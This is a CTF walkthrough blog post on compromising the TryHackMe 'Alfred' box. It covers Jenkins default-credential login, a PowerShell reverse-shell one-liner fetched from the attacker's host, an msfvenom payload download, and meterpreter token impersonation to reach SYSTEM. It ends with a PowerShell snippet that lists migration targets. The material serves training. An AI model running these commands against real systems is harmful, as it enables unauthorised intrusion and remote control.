Greetings everyone!
In today’s post, we’re going to try something a little different! I’ve recently signed up for a new hacking training platform called TryHackMe. I’ve read a few posts regarding TryHackMe, and the reviews have been nothing but outstanding, so I figured let’s give it a shot! In today’s post, I’ll be attacking the box called Alfred. So let’s get to it!
Alfred has an IP of 10.10.33.30. Knowing that, let’s start off with an Nmap scan!
Only 3 open ports are returned, so we don't have a lot to work with. Let's start by browsing to port 80:
RIP Bruce Wayne?? Well that’s not a message I wanted to see. Did Bane (the best super-villain) finally end Batman, once and for all?
Anyways, back to the mission at hand! After some poking around on this port, I tried accessing what was on port 8080:
Ah, this looks more promising! Anytime I come across a login screen, I like to start off with some default-credential and password guessing. Let's start with the good old admin:admin combo!
We’re in, just like that!
I've had no experience with Jenkins before, so I had to do some research on its weak/vulnerable points. Lucky for us, at the beginning of Alfred on the TryHackMe website, the author points us in the direction of using Nishang to gain initial access, by using one of its reverse shells. The only thing is, where do we fire it off?
After some more research and poking around, the “Build” tab in the Configure section for “project” shows something interesting:
Looks like we can execute some Windows commands here! This build step runs whatever we put in it under the account the Jenkins service itself runs as, so being able to configure a job is effectively code execution on the host. This is where we want to launch our shell. We're going to be using a PowerShell script from the Nishang repo:
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.10.249:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.10.249 -Port 9001
where 10.11.10.249 is our attacking machine's IP address and 9001 is the port our listener will wait on.
Now before we paste this into the "Build" section of the website, we're going to do two things: 1) spin up our own web server to host the script on, and 2) open up a listener with ncat on port 9001, the port named in the command:
Alright, let's fire off the shell! Once we paste the command into the "Build" section, we need to apply the changes and then select "Build Now" back at the project screen. Let's see if we're successful!
Great! We have a low-priv shell! Now let’s grab the user flag before we escalate our privileges.
One flag down, one to go!
Now the summary of this box mentions we can escalate privileges by "exploiting Windows authentication tokens". What we're going to do here is create a meterpreter payload with msfvenom, and hopefully use meterpreter to find a module that lets us abuse Windows authentication tokens!
Let’s create the payload:
Now that we have our payload created and saved, we'll need to download it to our target using PowerShell, so let's reuse the same download cradle as before, this time fetching our newly created payload instead of the Nishang script:
powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.11.10.249:80/Nath.exe','Nath.exe')"
We can paste this into the shell we already have on the target system:
Now to get our Meterpreter shell, we’ll need to use Metasploit to create a handler:
Let’s start the shell on the target system:
Sweet, now we have our meterpreter shell!
Now let’s see if we can impersonate some tokens! Let’s load the incognito module:
Now we can check to see what tokens are available:
The BUILTIN\Administrators token seems very promising, so let’s impersonate that one!
Alright, we're so close! One more step: we need to migrate into another process. Even though whoami now reports NT AUTHORITY\SYSTEM after impersonating the token, Windows decides what a process may do based on that process's primary token, not on the token one of its threads is impersonating, so some operations can still be denied. Migrating meterpreter into a process that already runs as SYSTEM gives us that primary token. services.exe is a good target, so let's migrate there:
Now let’s drop into another shell and grab the root flag!
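Before or right after the migrate step, it is worth checking what token you actually hold and which processes are viable migration targets. The PowerShell below is an added example and is not part of the original writeup, of Nishang, or of Metasploit; it uses only built-in cmdlets and .NET classes, and the list of preferred target process names is my own assumption.

```powershell
# Added example, not from the original writeup: sanity-check the token we are
# running under and list SYSTEM-owned processes that are candidates for migrate.
# Uses WMI rather than Get-Process -IncludeUserName so it also works on older
# PowerShell versions.

function Show-CurrentToken {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($id)
    $adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator

    "Identity           : $($id.Name)"
    "Impersonation level: $($id.ImpersonationLevel)"   # None = we hold a primary token
    "Admin group active : $($principal.IsInRole($adminRole))"

    # whoami /priv reports the privileges on whichever token is in effect right now;
    # these two are the ones that matter for token theft and process injection.
    whoami /priv | Select-String -Pattern 'SeDebugPrivilege|SeImpersonatePrivilege'
}

function Get-SystemProcessCandidates {
    # Long-lived SYSTEM processes that are the usual migration targets (assumption;
    # lsass.exe is deliberately left out because crashing it reboots the host).
    $preferred = @('services.exe', 'winlogon.exe', 'wininit.exe')

    Get-WmiObject -Class Win32_Process | ForEach-Object {
        $owner = $_.GetOwner()
        # GetOwner() returns a non-zero ReturnValue for processes we cannot open; skip them.
        if ($owner.ReturnValue -eq 0 -and
            $owner.Domain -eq 'NT AUTHORITY' -and $owner.User -eq 'SYSTEM') {
            New-Object PSObject -Property @{
                Pid       = $_.ProcessId
                Name      = $_.Name
                Preferred = ($preferred -contains $_.Name.ToLower())
            }
        }
    } | Sort-Object -Property @{Expression = 'Preferred'; Descending = $true}, Pid
}

Show-CurrentToken
Get-SystemProcessCandidates | Format-Table Pid, Name, Preferred -AutoSize
```

Run it in the shell you land in: the Pid column is what you hand to meterpreter's migrate command, and the Identity and Impersonation level lines show the difference between a thread that is merely impersonating SYSTEM and a process whose primary token is SYSTEM. Get-WmiObject is used on purpose because an older Windows target will not have the newer CIM cmdlets.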
WOW! What a fun box! Needless to say I’ll be spending more of my time on this amazing platform. In fact I may just start working on the next box right now….
Thanks for reading!